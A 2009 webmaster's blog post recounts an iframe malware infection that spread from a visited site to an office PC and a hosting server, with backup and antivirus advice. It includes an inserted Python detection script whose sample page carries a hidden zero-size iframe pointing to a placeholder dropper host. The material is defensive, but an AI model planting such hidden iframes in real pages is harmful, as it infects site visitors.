Well it has sure been 8 days this week! The Beatles, or rather John, got it right and I remember singing my heart out to it, night after night!!
This is the story...
Out of the blue it happened and even though we had all the firewalls on, pop-up blockers and virus programs on our computers, these got in!!
This particular insidious piece of code has several names, such as Packed Revolt, Trojan Horse etc., but it is an 'iframe' which is placed in the code behind what you see on the page.
This code is linked to a site with a .ru (Russian registry) address and it then tries to jump from that page to every computer which opens it. It is pure Malware or a Virus!
A client suggested we look at a site as he wanted one just like it. We did, and the moment we clicked on it we got many screens overlaying each other at a very fast rate and then the screen locked!!
I knew straight away we had been violated; however, it was now a matter of getting it off the computer it was on before it spread right through our network and to every site we had.
We rebooted the computer; however, a screen saver came up saying we had been violated and listed 20 or so viruses which were now on our system. It offered help by suggesting we buy their software called Total Security for $79 US and it would clean us up.
I was still able to use the computer programs however I knew once I looked at another page on the Internet, I would infect them.
Using another computer in the office, I did searches on Google and Yahoo to find out more about this Total Security thing and found it was a scam: whilst they did infect you, if you bought their program it would not be delivered as it did not exist, and now they had your payment details as well!
I downloaded some more free programs which they suggested we use to see exactly what was on the computer and, together with the ones we already use, spent 2 days just scanning and rescanning all the drives, especially the C Drive where the Windows and Documents and Settings directories are.
At first we came up with several viruses in the directories but more importantly, in the registry hiding amongst all the code. They do this so when you think you have all the files off and you reboot, they are rebuilt again from the registry, so you're virtually back where you started!
They also lodge in the areas of your drives which are set aside for when your system does an auto backup for later restoring purposes and in the areas set aside for the recycle bin. So you see they are very insidious.
I removed most of them by the second day (15 hours) and after several reboots, 3 programs showed the computer was clean.
So you think it was over... But a big 'NO' to that theory!
To set the scene..
This particular computer is the main computer used to access the admin areas of all the many web sites we host for our business clients as well as our own.
We go to our server where the web sites are using a method called 'FTP', which is the main method for uploading and downloading files to the websites. Everyone has a special user name and password, and it is rather like having a special key to your back door which only your closest friends can use on this 'back door'.
As we were way behind on our web site and hosting work we just had to bite the bullet and start doing our 'administration' business. After all, as we had a clean computer, we braved it and connected to our server.
Everything went fine until we started to download some files and the warning bells rang telling us it was a virus. Yes that same virus!
To cut the story short as it goes for another 6 days..
The virus had got into our server through someone else's FTP connection and infected many of our own and clients' files. This caused them to crash, so anyone looking for the page just saw a coded message.
We spent those 6 days changing everyone's passwords a few times and spending hours every day re-installing the files that had been corrupted, so the site could be online.
Even though we had the sites up, the next morning around 6am it was programmed to once again automatically change those clean files back to corrupted ones, so once again we had to spend the day re-installing from our clean backup.
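The cycle described above (a hidden iframe dropped into the site's files, then re-applied each morning after a restore) can be caught mechanically. The Python script below is an added example, not part of the original post or of any program it names. It flags iframes that load from a host outside your own list or that are sized or styled to be invisible, and lists files whose content differs from a clean backup copy, so it can be re-run after every restore. The host names, page contents and paths in it are constructed placeholders.

```python
import hashlib
import re
from pathlib import Path

# Heuristics for the injected iframe the post describes: a tag whose src points at a
# foreign host, and/or one sized or styled so that the visitor never sees it.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_HOST_RE = re.compile(r"""src\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE)


def suspicious_iframes(html, own_hosts):
    """Return the <iframe> tags in html that load from a host outside own_hosts or are hidden."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        m = SRC_HOST_RE.search(tag)
        host = m.group(1).lower() if m else ""      # "" for a relative src
        foreign = bool(host) and host not in own_hosts
        if foreign or HIDDEN_RE.search(tag):
            hits.append(tag)
    return hits


def scan_pages(pages, own_hosts):
    """pages maps relative path -> HTML text; returns only the pages carrying a suspicious iframe."""
    report = {}
    for path, html in pages.items():
        hits = suspicious_iframes(html, own_hosts)
        if hits:
            report[path] = hits
    return report


def snapshot(root):
    """Map each file under root (relative path) to its SHA-256, for live-vs-backup comparison."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def changed_files(live, backup):
    """Paths whose digest differs from the clean backup, or which the backup does not have at all."""
    return sorted(path for path, digest in live.items() if backup.get(path) != digest)


# Constructed sample pages; dropper.invalid is a reserved placeholder, not a real indicator.
OWN_HOSTS = {"www.example.com"}
CLEAN_PAGE = ('<html><body><h1>Example business site</h1>\n'
              '<iframe src="https://www.example.com/map" width="400" height="300"></iframe>\n'
              '</body></html>')
INFECTED_PAGE = CLEAN_PAGE.replace(
    "</body>", '<iframe src="http://dropper.invalid/in.php" width=0 height=0 '
               'style="visibility:hidden"></iframe></body>')

if __name__ == "__main__":
    for path, tags in scan_pages({"index.html": INFECTED_PAGE, "about.html": CLEAN_PAGE}, OWN_HOSTS).items():
        print(path, "->", tags)
    # On a real host: changed_files(snapshot("/path/to/live/site"), snapshot("/path/to/clean/backup"))
```

Because the re-infection in the post came back in through FTP accounts, a clean result from this script only holds until the next upload, so run it again after each restore and after every credential change.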
Over those days, eventually one by one our sites became clean from infection and have stayed up and online.
This morning the last 2 of them showed they were not infected and were still online.
So, it looks like we are now all okay.
What is the lesson here?
In our case, we were just looking at a normal business site which itself had been infected and we got it from them. As for how it got onto the computer through all our protection, we can only guess it was a 'new' variety which our virus and malware programs had not yet included in their 'definitions'.
A client had also got it from another source and after uploading his files, our server got it!!
The only thing one can do is the following..
1. Always, always, always have a backup of your files, especially the ones which are important to you. In fact it will also save you a lot of time, frustration and money if you have an 'image' or 'clone' copy of your complete C Drive. If it falls over for any reason, you just re-install the image or clone and you have all your programs and files from that drive up and running again.
We use a program called 'Acronis True Image' (about $70 US). It will do both methods of backup: 'images' (take up less space) and 'clones' (needs another full drive).
A backup should be made to an external hard drive and today they are as cheap as chips. They come in a case and just need to be plugged into your USB port. Get at least a 500 gig one, which will be able to take your whole C drive and others if you want to back them up.
http://www.acronis.com.au/homecomputing/
2. Always have at least 2 Malware and Virus programs running, especially for email and web browsers.
We use the very good AVG 8.5 Anti Virus and Anti Spyware program. It picked up 99.99% of our viruses.
http://free.avg.com/
We also use this very good program which is mainly a Malware program but very good and FREE!
http://www.malwarebytes.org/mbam.php
We also have Ad-Aware for scam advertising viruses.
http://www.lavasoft.com/products/ad_aware_free.php
You MUST keep up to date with these FREE programs, as ONLY the latest versions get the latest viruses!!
Make sure, if you use your computer a lot on the Internet, you at least do a scan of your main C Drive EVERY DAY by running these programs. They can run at night whilst you sleep, at least once a week.
Do NOT run them at the same time.
That's it!
If you haven't scanned your box for a while, do it now and think of what programs and files you have there which would have you devastated if you lost them.
Google and other sources say over the last month (Aug/Sept 2009) the amount of people reporting these problems has multiplied by 10 and going up.
Good Luck!!!
Lonnie
Webmaster